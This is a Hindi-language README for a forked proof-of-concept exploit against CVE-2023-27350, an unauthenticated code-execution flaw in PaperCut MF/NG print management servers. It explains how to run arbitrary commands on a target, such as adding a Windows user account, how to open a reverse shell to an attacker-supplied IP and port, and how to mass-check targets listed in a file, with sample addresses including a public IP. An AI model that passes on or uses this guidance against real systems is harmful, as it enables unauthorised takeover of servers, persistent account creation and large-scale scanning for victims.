
Papercut CVE-2023-27350 के लिए एक्सप्लॉइट। [+] रिवर्स शेल [+] सामूहिक जाँच
यह CVE-2023-27350 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) एक्सप्लॉइट है, जो PaperCut MF/NG में पाई गई एक भेद्यता है जो एक अप्रमाणित हमलावर को SYSTEM विशेषाधिकारों के साथ मनमाना कोड निष्पादित करने की अनुमति देती है।
इस एक्सप्लॉइट का उपयोग करने से पहले, सुनिश्चित करें कि आपने निम्नलिखित लाइब्रेरीज़ इंस्टॉल कर ली हैं:
pip install -r requirements.txt
-u, --url: लक्षित PaperCut MF/NG एप्लिकेशन का URL (उदा., http://target-ip:9191).-c, --command: लक्षित सिस्टम पर निष्पादित की जाने वाली कमांड।--reverse-shell: लक्षित सिस्टम पर कमांड निष्पादित करने के लिए रिवर्स शेल पेलोड का उपयोग करें।-f, --file: एक फ़ाइल से कई लक्ष्यों की जाँच करें (उदा., file.txt).लक्षित सिस्टम पर कमांड निष्पादित करने के लिए, -c विकल्प का उपयोग करें:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
लक्षित सिस्टम पर कमांड निष्पादित करने के लिए रिवर्स शेल पेलोड का उपयोग करने हेतु, --reverse-shell विकल्प का उपयोग करें। आपको अपना IP पता और पोर्ट नंबर दर्ज करने के लिए संकेत दिया जाएगा:
python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>
एक फ़ाइल से कई लक्ष्यों की जाँच करने के लिए, -f विकल्प का उपयोग करें। फ़ाइल का प्रारूप ip_address:port होना चाहिए:
python CVE-2023-27350.py -f file.txt
file.txt को फ़ॉर्मेट करनाजब file.txt इनपुट के साथ बल्क जाँच विकल्प का उपयोग करें, तो सुनिश्चित करें कि फ़ाइल की सामग्री सही ढंग से फ़ॉर्मेट की गई है।
फ़ाइल की प्रत्येक पंक्ति में एक लक्ष्य का IP पता और पोर्ट नंबर होना चाहिए, जो कोलन : द्वारा अलग किए गए हों। उदाहरण के लिए:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
सुनिश्चित करें कि IP पता, कोलन और पोर्ट नंबर के बीच कोई अतिरिक्त स्थान या वर्ण न हों। साथ ही, सुनिश्चित करें कि प्रत्येक पंक्ति में केवल एक IP पता और पोर्ट नंबर हो।
यह horizon3ai/CVE-2023-27350 रिपॉज़िटरी का एक फ़ोर्क्ड संस्करण है। मूल एक्सप्लॉइट का सारा श्रेय लेखकों को जाता है।